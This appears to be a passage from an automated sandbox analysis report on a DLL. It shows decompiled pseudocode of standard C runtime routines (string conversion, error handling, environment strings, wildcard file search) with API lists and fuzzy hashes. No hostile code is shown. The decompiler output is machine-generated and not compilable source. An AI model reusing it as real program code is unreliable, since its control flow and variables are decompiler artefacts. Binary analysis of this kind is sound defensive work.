                							_t93 = _t64;
                							if(_t64 != 0) {
                								goto L38;
                							}
                							goto L37;
                						}
                					}
                					if(_t49 > 0x400) {
                						_t71 = E6EA58C23(_t75, _t49);
                						_pop(_t75);
                						if(_t71 == 0) {
                							L13:
                							_t83 = _v12;
                							goto L15;
                						}
                						 *_t71 = 0xdddd;
                						L12:
                						_t71 =  &(_t71[4]);
                						goto L13;
                					}
                					E6EA5CFE0();
                					_t71 = _t95;
                					if(_t71 == 0) {
                						goto L13;
                					}
                					 *_t71 = 0xcccc;
                					goto L12;
                				}
                			}






















                APIs
                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,6EA57A69,00000000,?,?,?,6EA59BAC,?,?,00000100), ref: 6EA599EC
                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000,?,?,?,6EA59BAC,?,?,00000100,5EFC4D8B,?,?), ref: 6EA59A55
                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000), ref: 6EA59B35
                • __freea.LIBCMT ref: 6EA59B42
                  • Part of subcall function 6EA58C23: HeapAlloc.KERNEL32(00000000,?,?,?,6EA576B7,00000220,?,?,?,?,?,?,6EA93E18,6EA55A68), ref: 6EA58C55
                • __freea.LIBCMT ref: 6EA59B4B
                • __freea.LIBCMT ref: 6EA59B70
                Memory Dump Source
                • Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true
                • Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp
                • Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp
                • Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp
                • Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp
                Similarity
                • API ID: ByteCharMultiWide__freea$AllocHeap
                • String ID:
                • API String ID: 3147120248-0
                • Opcode ID: f675d79150e86447b25c1bfe410a9dcd5c9089e616f127d89eaf6057b14112b3
                • Instruction ID: eac3951f094c2249541b2310fbc0ee1d009cd20f402b230bd2d4ff105ba19280
                • Opcode Fuzzy Hash: f675d79150e86447b25c1bfe410a9dcd5c9089e616f127d89eaf6057b14112b3
                • Instruction Fuzzy Hash: 5A51B3B2500206AFEB118FD4CE40EAB77AEEB45750F164529FD289F350D734DCA19668
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 79%
                			E6EA543C6(void* __ecx) {
                				void* _t4;
                				void* _t11;
                				void* _t16;
                				long _t25;
                				void* _t28;
                
                				if( *0x6ea93020 != 0xffffffff) {
                					_t25 = GetLastError();
                					_t11 = E6EA546D7(__eflags,  *0x6ea93020);
                					__eflags = _t11 - 0xffffffff;
                					if(_t11 == 0xffffffff) {
                						L5:
                						_t11 = 0;
                					} else {
                						__eflags = _t11;
                						if(__eflags == 0) {
                							_t4 = E6EA54712(__eflags,  *0x6ea93020, 0xffffffff);
                							_pop(_t16);
                							__eflags = _t4;
                							if(_t4 != 0) {
                								_push(0x28);
                								_push(1);
                								_t28 = E6EA5647C(_t16);
                								__eflags = _t28;
                								if(__eflags == 0) {
                									L8:
                									_t11 = 0;
                									E6EA54712(__eflags,  *0x6ea93020, 0);
                								} else {
                									__eflags = E6EA54712(__eflags,  *0x6ea93020, _t28);
                									if(__eflags != 0) {
                										_t11 = _t28;
                										_t28 = 0;
                										__eflags = 0;
                									} else {
                										goto L8;
                									}
                								}
                								E6EA562C6(_t28);
                							} else {
                								goto L5;
                							}
                						}
                					}
                					SetLastError(_t25);
                					return _t11;
                				} else {
                					return 0;
                				}
                			}


                APIs
                • GetLastError.KERNEL32(00000001,?,6EA54018,6EA53854,6EA5328E,?,6EA534AB,?,00000001,?,?,00000001,?,6EA92080,0000000C,6EA5359F), ref: 6EA543D4
                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6EA543E2
                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6EA543FB
                • SetLastError.KERNEL32(00000000,6EA534AB,?,00000001,?,?,00000001,?,6EA92080,0000000C,6EA5359F,?,00000001,?), ref: 6EA5444D
                Memory Dump Source
                • Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true
                • Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp
                • Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp
                • Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp
                • Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp
                Similarity
                • API ID: ErrorLastValue___vcrt_
                • String ID:
                • API String ID: 3852720340-0
                • Opcode ID: 6721d715c6c895c9400f0d32e66c7cfdf5572bb6c1083b8842b0fd80b3d34035
                • Instruction ID: e242b94e1e5fdc6557a0f2aec78d147eff6381320d7cc174e595359cc1b372eb
                • Opcode Fuzzy Hash: 6721d715c6c895c9400f0d32e66c7cfdf5572bb6c1083b8842b0fd80b3d34035
                • Instruction Fuzzy Hash: FD019C3216CB111FA70405F85E886AA2BB9EB07278321C229F1166A3E0FF314CF7520C
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 65%
                			E6EA56E65(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, intOrPtr _a12) {
                				intOrPtr _v0;
                				signed int _v6;
                				char _v8;
                				signed int _v12;
                				signed int _v16;
                				intOrPtr _v20;
                				intOrPtr _v24;
                				signed int _v28;
                				signed char _v36;
                				signed char _v40;
                				void* _v44;
                				intOrPtr* _v72;
                				intOrPtr _v104;
                				intOrPtr* _v108;
                				CHAR* _v112;
                				signed int _v124;
                				intOrPtr _v290;
                				intOrPtr _v291;
                				struct _WIN32_FIND_DATAA _v336;
                				union _FINDEX_INFO_LEVELS _v340;
                				signed int _v344;
                				signed int _v348;
                				intOrPtr _v448;
                				intOrPtr* _t103;
                				signed int _t105;
                				signed int _t110;
                				void* _t111;
                				intOrPtr* _t121;
                				intOrPtr _t123;
                				intOrPtr _t124;
                				void* _t128;
                				intOrPtr _t130;
                				void* _t135;
                				signed int _t137;
                				intOrPtr _t139;
                				signed char _t140;
                				union _FINDEX_INFO_LEVELS _t148;
                				int _t153;
                				signed int _t162;
                				signed int _t165;
                				void* _t167;
                				char _t168;
                				void* _t169;
                				intOrPtr _t171;
                				signed int _t177;
                				signed int* _t178;
                				signed int _t181;
                				void* _t184;
                				intOrPtr _t185;
                				union _FINDEX_INFO_LEVELS _t186;
                				intOrPtr _t189;
                				signed char _t191;
                				signed int _t192;
                				signed int _t193;
                				signed int _t195;
                				intOrPtr* _t198;
                				signed int _t200;
                				void* _t202;
                				intOrPtr* _t203;
                				intOrPtr _t211;
                				signed int _t218;
                				intOrPtr* _t219;
                				intOrPtr* _t227;
                				void* _t229;
                				intOrPtr _t230;
                				signed int _t233;
                				signed int _t235;
                				signed int _t237;
                				signed int _t238;
                				CHAR* _t240;
                				signed int _t245;
                				signed int _t247;
                				signed int _t248;
                				signed int _t249;
                				signed int _t251;
                				intOrPtr _t252;
                				void* _t253;
                				signed int _t255;
                				void* _t258;
                				void* _t260;
                				void* _t261;
                				void* _t262;
                				signed int _t263;
                				void* _t264;
                				void* _t265;
                
                				_t103 = _a8;
                				_t261 = _t260 - 0x28;
                				if(_t103 != 0) {
                					_t245 = _a4;
                					_t181 = 0;
                					 *_t103 = 0;
                					_t235 = 0;
                					_t191 = 0;
                					_v44 = 0;
                					_v40 = 0;
                					_v36 = 0;
                					if( *_t245 == 0) {
                						L9:
                						_v12 = _t181;
                						_t105 = _t191 - _t235;
                						_v8 = _t235;
                						_t224 = (_t105 >> 2) + 1;
                						_v16 = (_t105 >> 2) + 1;
                						asm("sbb esi, esi");
                						_t247 =  !_t245 & _t105 + 0x00000003 >> 0x00000002;
                						if(_t247 != 0) {
                							_t169 = _t235;
                							_t233 = _t181;
                							do {
                								_t219 =  *_t169;
                								_t17 = _t219 + 1; // 0x1
                								_v20 = _t17;
                								do {
                									_t171 =  *_t219;
                									_t219 = _t219 + 1;
                								} while (_t171 != 0);
                								_v12 = _v12 + 1 + _t219 - _v20;
                								_t169 = _v8 + 4;
                								_t233 = _t233 + 1;
                								_v8 = _t169;
                							} while (_t233 != _t247);
                							_t224 = _v16;
                						}
                						_t248 = E6EA55CD4(_t224, _v12, 1);
                						_t262 = _t261 + 0xc;
                						if(_t248 != 0) {
                							_v8 = _t235;
                							_t110 = _t248 + _v16 * 4;
                							_t192 = _t110;
                							_v28 = _t110;
                							_t111 = _t235;
                							_v16 = _t192;
                							if(_t235 == _v40) {
                								L24:
                								_v12 = _t181;
                								 *_a8 = _t248;
                								_t249 = _t181;
                								goto L25;
                							} else {
                								_v336.cAlternateFileName = _t248 - _t235;
                								do {
                									_t121 =  *_t111;
                									_t227 = _t121;
                									_v24 = _t121;
                									_v20 = _t227 + 1;
                									do {
                										_t123 =  *_t227;
                										_t227 = _t227 + 1;
                									} while (_t123 != 0);
                									_t124 = _t227 - _v20 + 1;
                									_push(_t124);
                									_v20 = _t124;
                									_t128 = E6EA59795(_t192, _t192, _v28 - _t192 + _v12, _v24);
                									_t262 = _t262 + 0x10;
                									if(_t128 != 0) {
                										_push(_t181);
                										_push(_t181);
                										_push(_t181);
                										_push(_t181);
                										_push(_t181);
                										E6EA56CF6();
                										asm("int3");
                										_t258 = _t262;
                										_push(_t192);
                										_t198 = _v72;
                										_t65 = _t198 + 1; // 0x1
                										_t229 = _t65;
                										do {
                											_t130 =  *_t198;
                											_t198 = _t198 + 1;
                										} while (_t130 != 0);
                										_push(_t235);
                										_t238 = _a8;
                										_t200 = _t198 - _t229 + 1;
                										_v12 = _t200;
                										if(_t200 <=  !_t238) {
                											_push(_t181);
                											_t68 = _t238 + 1; // 0x1
                											_t184 = _t68 + _t200;
                											_t252 = E6EA56DB6(_t200, _t184, 1);
                											_t202 = _t248;
                											if(_t238 == 0) {
                												L39:
                												_push(_v12);
                												_t184 = _t184 - _t238;
                												_t135 = E6EA59795(_t202, _t252 + _t238, _t184, _v0);
                												_t263 = _t262 + 0x10;
                												if(_t135 != 0) {
                													goto L45;
                												} else {
                													_t189 = _a12;
                													_t162 = E6EA57278(_t189);
                													_v12 = _t162;
                													if(_t162 == 0) {
                														 *((intOrPtr*)( *((intOrPtr*)(_t189 + 4)))) = _t252;
                														_t255 = 0;
                														 *((intOrPtr*)(_t189 + 4)) =  *((intOrPtr*)(_t189 + 4)) + 4;
                													} else {
                														E6EA56E13(_t252);
                														_t255 = _v12;
                													}
                													E6EA56E13(0);
                													_t165 = _t255;
                													goto L44;
                												}
                											} else {
                												_push(_t238);
                												_t167 = E6EA59795(_t202, _t252, _t184, _a4);
                												_t263 = _t262 + 0x10;
                												if(_t167 != 0) {
                													L45:
                													_push(0);
                													_push(0);
                													_push(0);
                													_push(0);
                													_push(0);
                													E6EA56CF6();
                													asm("int3");
                													_push(_t258);
                													_t259 = _t263;
                													_t264 = _t263 - 0x150;
                													_t137 =  *0x6ea93004; // 0x90a7628e
                													_v124 = _t137 ^ _t263;
                													_t203 = _v108;
                													_push(_t184);
                													_t185 = _v104;
                													_push(0);
                													_t240 = _v112;
                													_v448 = _t185;
                													while(_t203 != _t240) {
                														_t139 =  *_t203;
                														if(_t139 != 0x2f && _t139 != 0x5c && _t139 != 0x3a) {
                															_t203 = E6EA597E0(_t240, _t203);
                															continue;
                														}
                														break;
                													}
                													_t230 =  *_t203;
                													if(_t230 != 0x3a || _t203 ==  &(_t240[1])) {
                														_t186 = 0;
                														if(_t230 == 0x2f || _t230 == 0x5c) {
                															L58:
                															_t140 = 1;
                														} else {
                															_t140 = 0;
                															if(_t230 == 0x3a) {
                																goto L58;
                															}
                														}
                														_push(_t252);
                														asm("sbb eax, eax");
                														_v344 =  ~(_t140 & 0x000000ff) & _t203 - _t240 + 0x00000001;
                														E6EA54050(_t240,  &_v336, _t186, 0x140);
                														_t265 = _t264 + 0xc;
                														_t253 = FindFirstFileExA(_t240, _t186,  &_v336, _t186, _t186, _t186);
                														_t148 = _v340;
                														if(_t253 != 0xffffffff) {
                															_v348 =  *((intOrPtr*)(_t148 + 4)) -  *_t148 >> 2;
                															do {
                																if(_v336.cFileName != 0x2e) {
                																	L71:
                																	_push(_t148);
                																	_push(_v344);
                																	_t148 =  &(_v336.cFileName);
                																	_push(_t240);
                																	_push(_t148);
                																	L33();
                																	_t265 = _t265 + 0x10;
                																	if(_t148 != 0) {
                																		goto L61;
                																	} else {
                																		goto L72;
                																	}
                																} else {
                																	_t211 = _v291;
                																	if(_t211 == 0 || _t211 == 0x2e && _v290 == _t186) {
                																		goto L72;
                																	} else {
                																		goto L71;
                																	}
                																}
                																goto L65;
                																L72:
                																_t153 = FindNextFileA(_t253,  &_v336);
                																_t148 = _v340;
                															} while (_t153 != 0);
                															_t231 =  *_t148;
                															_t212 = _v348;
                															_t156 =  *((intOrPtr*)(_t148 + 4)) -  *_t148 >> 2;
                															if(_v348 !=  *((intOrPtr*)(_t148 + 4)) -  *_t148 >> 2) {
                																E6EA592A0(_t186, _t240, _t253, _t231 + _t212 * 4, _t156 - _t212, 4, E6EA56E4D);
                															}
                														} else {
                															_push(_t148);
                															_push(_t186);
                															_push(_t186);
                															_push(_t240);
                															L33();
                															L61:
                															_t186 = _t148;
                														}
                														if(_t253 != 0xffffffff) {
                															FindClose(_t253);
                														}
                													} else {
                														_push(_t185);
                														_push(0);
                														_push(0);
                														_push(_t240);
                														L33();
                													}
                													L65:
                													return E6EA53252(_v16 ^ _t259);
                												} else {
                													goto L39;
                												}
                											}
                										} else {
                											_t165 = 0xc;
                											L44:
                											return _t165;
                										}
                									} else {
                										goto L23;
                									}
                									goto L75;
                									L23:
                									_t168 = _v8;
                									_t218 = _v16;
                									 *((intOrPtr*)(_v336.cAlternateFileName + _t168)) = _t218;
                									_t111 = _t168 + 4;
                									_t192 = _t218 + _v20;
                									_v16 = _t192;
                									_v8 = _t111;
                								} while (_t111 != _v40);
                								goto L24;
                							}
                						} else {
                							_t249 = _t248 | 0xffffffff;
                							_v12 = _t249;
                							L25:
                							E6EA56E13(_t181);
                							_pop(_t193);
                							goto L26;
                						}
                					} else {
                						while(1) {
                							_v8 = 0x3f2a;
                							_v6 = _t181;
                							_t177 = E6EA597A0( *_t245,  &_v8);
                							_pop(_t193);
                							if(_t177 != 0) {
                								_t193 =  &_v44;
                								_push(_t193);
                								_push(_t177);
                								_push( *_t245);
                								L46();
                								_t261 = _t261 + 0xc;
                							} else {
                								_t177 =  &_v44;
                								_push(_t177);
                								_push(_t181);
                								_push(_t181);
                								_push( *_t245);
                								L33();
                								_t261 = _t261 + 0x10;
                							}
                							_v12 = _t177;
                							if(_t177 != 0) {
                								break;
                							}
                							_t245 = _t245 + 4;
                							if( *_t245 != _t181) {
                								continue;
                							} else {
                								_t235 = _v44;
                								_t191 = _v40;
                								goto L9;
                							}
                							goto L75;
                						}
                						_t235 = _v44;
                						_t249 = _v12;
                						L26:
                						_v28 = _t235;
                						asm("sbb ecx, ecx");
                						_t195 =  !_t193 & _v40 - _t235 + 0x00000003 >> 0x00000002;
                						_v336.cAlternateFileName = _t195;
                						if(_t195 != 0) {
                							_t251 = _v28;
                							_t237 = _t195;
                							do {
                								E6EA56E13( *_t251);
                								_t181 = _t181 + 1;
                								_t251 = _t251 + 4;
                							} while (_t181 != _t237);
                							_t235 = _v44;
                							_t249 = _v12;
                						}
                						E6EA56E13(_t235);
                						goto L31;
                					}
                				} else {
                					_t178 = E6EA56DA3();
                					_t249 = 0x16;
                					 *_t178 = _t249;
                					E6EA56CE6();
                					L31:
                					return _t249;
                				}
                				L75:
                			}

                0x6ea56eca
                0x6ea56ede
                0x6ea56ee3
                0x00000000
                0x00000000
                0x6ea56ee5
                0x6ea56eea
                0x00000000
                0x6ea56eec
                0x6ea56eec
                0x6ea56eef
                0x00000000
                0x6ea56eef
                0x00000000
                0x6ea56eea
                0x6ea56f64
                0x6ea56f67
                0x6ea56ff3
                0x6ea56ff8
                0x6ea57004
                0x6ea57008
                0x6ea5700a
                0x6ea5700d
                0x6ea5700f
                0x6ea57012
                0x6ea57014
                0x6ea57016
                0x6ea5701b
                0x6ea5701c
                0x6ea57020
                0x6ea57024
                0x6ea57027
                0x6ea57027
                0x6ea5702b
                0x00000000
                0x6ea57032
                0x6ea56e75
                0x6ea56e75
                0x6ea56e7c
                0x6ea56e7d
                0x6ea56e7f
                0x6ea57033
                0x6ea57039
                0x6ea57039
                0x00000000

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true
                • Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp
                • Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp
                • Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp
                • Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp
                Similarity
                • API ID: _free
                • String ID: *?$.
                • API String ID: 269201875-3972193922
                • Opcode ID: e5bfa105808f6d7b0cf0bc7c1212016d5e2fea3d1ba2796f60230dbf41088895
                • Instruction ID: 76a5368d773a380b3390b00d667be572a212e2fa979da78d3219bcc28bcf1b1c
                • Opcode Fuzzy Hash: e5bfa105808f6d7b0cf0bc7c1212016d5e2fea3d1ba2796f60230dbf41088895
                • Instruction Fuzzy Hash: 51616D76D142199FCB10CFD9C9805DDFBF9EF88314B28456AE814E7300E731AE918B94
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,6EA55937,?,?,6EA558FF,?,00000001), ref: 6EA559A6
                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6EA559B9
                • FreeLibrary.KERNEL32(00000000,?,?,?,6EA55937,?,?,6EA558FF,?,00000001), ref: 6EA559DC
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true
                • Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp
                • Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp
                • Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp
                • Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp
                Similarity
                • API ID: AddressFreeHandleLibraryModuleProc
                • String ID: CorExitProcess$mscoree.dll
                • API String ID: 4061214504-1276376045
                • Opcode ID: 294d0de6762d412cc0f38edf4e59359d3de7b4608cbe558808421ff17bd5bd02
                • Instruction ID: 01e4e4a21b2567e160d0662fd010820314cc6fa8f97a5bca2c11b443bf4896e8
                • Opcode Fuzzy Hash: 294d0de6762d412cc0f38edf4e59359d3de7b4608cbe558808421ff17bd5bd02
                • Instruction Fuzzy Hash: 35F03C30901708FBDF019FE0C849BAEBFB8FB45312F518165E805AA240CB348E91CA99
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 93%
                			E6EA57BBF() {
                				int _v8;
                				void* __ecx;
                				void* _t6;
                				int _t7;
                				char* _t13;
                				int _t17;
                				void* _t19;
                				char* _t25;
                				WCHAR* _t27;
                
                				_t27 = GetEnvironmentStringsW();
                				if(_t27 == 0) {
                					L7:
                					_t13 = 0;
                				} else {
                					_t6 = E6EA57B88(_t27);
                					_pop(_t19);
                					_t17 = _t6 - _t27 >> 1;
                					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
                					_v8 = _t7;
                					if(_t7 == 0) {
                						goto L7;
                					} else {
                						_t25 = E6EA58C23(_t19, _t7);
                						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
                							_t13 = 0;
                						} else {
                							_t13 = _t25;
                							_t25 = 0;
                						}
                						E6EA56E13(_t25);
                					}
                				}
                				if(_t27 != 0) {
                					FreeEnvironmentStringsW(_t27);
                				}
                				return _t13;
                			}













                APIs
                • GetEnvironmentStringsW.KERNEL32 ref: 6EA57BC8
                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6EA57BEB
                  • Part of subcall function 6EA58C23: HeapAlloc.KERNEL32(00000000,?,?,?,6EA576B7,00000220,?,?,?,?,?,?,6EA93E18,6EA55A68), ref: 6EA58C55
                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 6EA57C11
                • _free.LIBCMT ref: 6EA57C24
                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6EA57C33
                Memory Dump Source
                • Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true
                • Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp
                • Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp
                • Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp
                • Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp
                Similarity
                • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                • String ID:
                • API String ID: 2278895681-0
                • Opcode ID: e5a4119e9e99755fc02f858fc224d2dd669478cf1a500cdc9eb801c91b453f89
                • Instruction ID: 1635e1f069a0e71af945c97baece9c171d21ba204ea2460b8c843381e1b05a1c
                • Opcode Fuzzy Hash: e5a4119e9e99755fc02f858fc224d2dd669478cf1a500cdc9eb801c91b453f89
                • Instruction Fuzzy Hash: 5601D472601B167F27211AFA5C8CC7F7E6DDAC7AA03158529FC04E7380DA708C5289B4
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 87%
                			E6EA56955(void* __ecx) {
                				void* __esi;
                				intOrPtr _t2;
                				void* _t3;
                				void* _t5;
                				void* _t14;
                				void* _t16;
                				void* _t18;
                				long _t19;
                
                				_t14 = __ecx;
                				_t19 = GetLastError();
                				_t2 =  *0x6ea93044; // 0x4
                				_t22 = _t2 - 0xffffffff;
                				if(_t2 == 0xffffffff) {
                					L6:
                					_t3 = E6EA57F91(_t14, _t19, __eflags, _t2, 0xffffffff);
                					__eflags = _t3;
                					if(_t3 == 0) {
                						goto L3;
                					} else {
                						_t5 = E6EA56DB6(_t14, 1, 0x364);
                						_pop(_t16);
                						_t18 = _t5;
                						__eflags = _t18;
                						if(__eflags != 0) {
                							__eflags = E6EA57F91(_t16, _t19, __eflags,  *0x6ea93044, _t18);
                							if(__eflags != 0) {
                								E6EA56605(_t19, _t18, 0x6ea9413c);
                								E6EA56E13(0);
                								goto L13;
                							} else {
                								E6EA57F91(_t16, _t19, __eflags,  *0x6ea93044, 0);
                								_push(_t18);
                								goto L9;
                							}
                						} else {
                							E6EA57F91(_t16, _t19, __eflags,  *0x6ea93044, 0);
                							_push(0);
                							L9:
                							E6EA56E13();
                							goto L3;
                						}
                					}
                				} else {
                					_t18 = E6EA57F3B(_t14, _t19, _t22, _t2);
                					if(_t18 == 0) {
                						_t2 =  *0x6ea93044; // 0x4
                						goto L6;
                					} else {
                						if(_t18 != 0xffffffff) {
                							L13:
                							__eflags = _t18;
                							if(_t18 == 0) {
                								goto L3;
                							} else {
                								SetLastError(_t19);
                							}
                						} else {
                							L3:
                							SetLastError(_t19);
                							_t18 = 0;
                						}
                					}
                				}
                				return _t18;
                			}












                APIs
                • GetLastError.KERNEL32(?,?,90A7628E,6EA56DA8,6EA56E39,?,?,6EA56067), ref: 6EA5695A
                • SetLastError.KERNEL32(00000000,00000004,000000FF,?,90A7628E,6EA56DA8,6EA56E39,?,?,6EA56067), ref: 6EA56980
                • _free.LIBCMT ref: 6EA569C0
                • _free.LIBCMT ref: 6EA569F3
                • SetLastError.KERNEL32(00000000), ref: 6EA56A00
                Memory Dump Source
                • Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true
                • Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp
                • Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp
                • Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp
                • Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp
                Similarity
                • API ID: ErrorLast$_free
                • String ID:
                • API String ID: 3170660625-0
                • Opcode ID: 14f31c164c3fe7e5948bb6460339e663b264d566c71c68087cd2a6008f31bf13
                • Instruction ID: b45de6d9bc1449f1b147c1e2ba2bda4175b326fb5828f907441913867c184808
                • Opcode Fuzzy Hash: 14f31c164c3fe7e5948bb6460339e663b264d566c71c68087cd2a6008f31bf13
                • Instruction Fuzzy Hash: 2A110C72134B01FA9A0156F94E5898B36BD5BC373472A4524F568B63C0EF35CCF6802D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 77%
                			E6EA56807(void* __ebx, void* __ecx, void* __edx) {
                				void* __edi;
                				void* __esi;
                				intOrPtr _t2;
                				long _t3;
                				intOrPtr _t5;
                				long _t6;
                				intOrPtr _t9;
                				long _t10;
                				long _t12;
                				void* _t38;
                				void* _t41;
                				void* _t43;
                				void* _t47;
                				long _t48;
                				long _t49;
                				long _t53;
                				long _t54;
                				void* _t58;
                
                				_t47 = __edx;
                				_t41 = __ecx;
                				_t38 = __ebx;
                				_push(_t48);
                				_t53 = GetLastError();
                				_t2 =  *0x6ea93044; // 0x4
                				_t60 = _t2 - 0xffffffff;
                				if(_t2 == 0xffffffff) {
                					L5:
                					_t3 = E6EA57F91(_t41, _t53, __eflags, _t2, 0xffffffff);
                					__eflags = _t3;
                					if(_t3 == 0) {
                						goto L14;
                					} else {
                						_t48 = E6EA56DB6(_t41, 1, 0x364);
                						_pop(_t41);
                						__eflags = _t48;
                						if(__eflags != 0) {
                							__eflags = E6EA57F91(_t41, _t53, __eflags,  *0x6ea93044, _t48);
                							if(__eflags != 0) {
                								E6EA56605(_t53, _t48, 0x6ea9413c);
                								E6EA56E13(0);
                								_t58 = _t58 + 0xc;
                								goto L12;
                							} else {
                								E6EA57F91(_t41, _t53, __eflags,  *0x6ea93044, _t30);
                								_push(_t48);
                								goto L8;
                							}
                						} else {
                							E6EA57F91(_t41, _t53, __eflags,  *0x6ea93044, _t29);
                							_push(_t48);
                							L8:
                							E6EA56E13();
                							_pop(_t41);
                							goto L14;
                						}
                					}
                				} else {
                					_t48 = E6EA57F3B(_t41, _t53, _t60, _t2);
                					if(_t48 == 0) {
                						_t2 =  *0x6ea93044; // 0x4
                						goto L5;
                					} else {
                						if(_t48 != 0xffffffff) {
                							L12:
                							__eflags = _t48;
                							if(_t48 == 0) {
                								goto L14;
                							} else {
                								SetLastError(_t53);
                								return _t48;
                							}
                						} else {
                							L14:
                							SetLastError(_t53);
                							E6EA56438(_t38, _t41, _t47, _t48, _t53);
                							asm("int3");
                							_t5 =  *0x6ea93044; // 0x4
                							_push(_t53);
                							_t63 = _t5 - 0xffffffff;
                							if(_t5 == 0xffffffff) {
                								L20:
                								_t6 = E6EA57F91(_t41, _t53, __eflags, _t5, 0xffffffff);
                								__eflags = _t6;
                								if(_t6 == 0) {
                									goto L29;
                								} else {
                									_t53 = E6EA56DB6(_t41, 1, 0x364);
                									_pop(_t41);
                									__eflags = _t53;
                									if(__eflags != 0) {
                										__eflags = E6EA57F91(_t41, _t53, __eflags,  *0x6ea93044, _t53);
                										if(__eflags != 0) {
                											E6EA56605(_t53, _t53, 0x6ea9413c);
                											E6EA56E13(0);
                											_t58 = _t58 + 0xc;
                											goto L27;
                										} else {
                											E6EA57F91(_t41, _t53, __eflags,  *0x6ea93044, _t21);
                											_push(_t53);
                											goto L23;
                										}
                									} else {
                										E6EA57F91(_t41, _t53, __eflags,  *0x6ea93044, _t20);
                										_push(_t53);
                										L23:
                										E6EA56E13();
                										_pop(_t41);
                										goto L29;
                									}
                								}
                							} else {
                								_t53 = E6EA57F3B(_t41, _t53, _t63, _t5);
                								if(_t53 == 0) {
                									_t5 =  *0x6ea93044; // 0x4
                									goto L20;
                								} else {
                									if(_t53 != 0xffffffff) {
                										L27:
                										__eflags = _t53;
                										if(_t53 == 0) {
                											goto L29;
                										} else {
                											return _t53;
                										}
                									} else {
                										L29:
                										E6EA56438(_t38, _t41, _t47, _t48, _t53);
                										asm("int3");
                										_push(_t38);
                										_push(_t53);
                										_push(_t48);
                										_t54 = GetLastError();
                										_t9 =  *0x6ea93044; // 0x4
                										_t66 = _t9 - 0xffffffff;
                										if(_t9 == 0xffffffff) {
                											L36:
                											_t10 = E6EA57F91(_t41, _t54, __eflags, _t9, 0xffffffff);
                											__eflags = _t10;
                											if(_t10 == 0) {
                												goto L33;
                											} else {
                												_t12 = E6EA56DB6(_t41, 1, 0x364);
                												_pop(_t43);
                												_t49 = _t12;
                												__eflags = _t49;
                												if(__eflags != 0) {
                													__eflags = E6EA57F91(_t43, _t54, __eflags,  *0x6ea93044, _t49);
                													if(__eflags != 0) {
                														E6EA56605(_t54, _t49, 0x6ea9413c);
                														E6EA56E13(0);
                														goto L43;
                													} else {
                														E6EA57F91(_t43, _t54, __eflags,  *0x6ea93044, 0);
                														_push(_t49);
                														goto L39;
                													}
                												} else {
                													E6EA57F91(_t43, _t54, __eflags,  *0x6ea93044, 0);
                													_push(0);
                													L39:
                													E6EA56E13();
                													goto L33;
                												}
                											}
                										} else {
                											_t49 = E6EA57F3B(_t41, _t54, _t66, _t9);
                											if(_t49 == 0) {
                												_t9 =  *0x6ea93044; // 0x4
                												goto L36;
                											} else {
                												if(_t49 != 0xffffffff) {
                													L43:
                													__eflags = _t49;
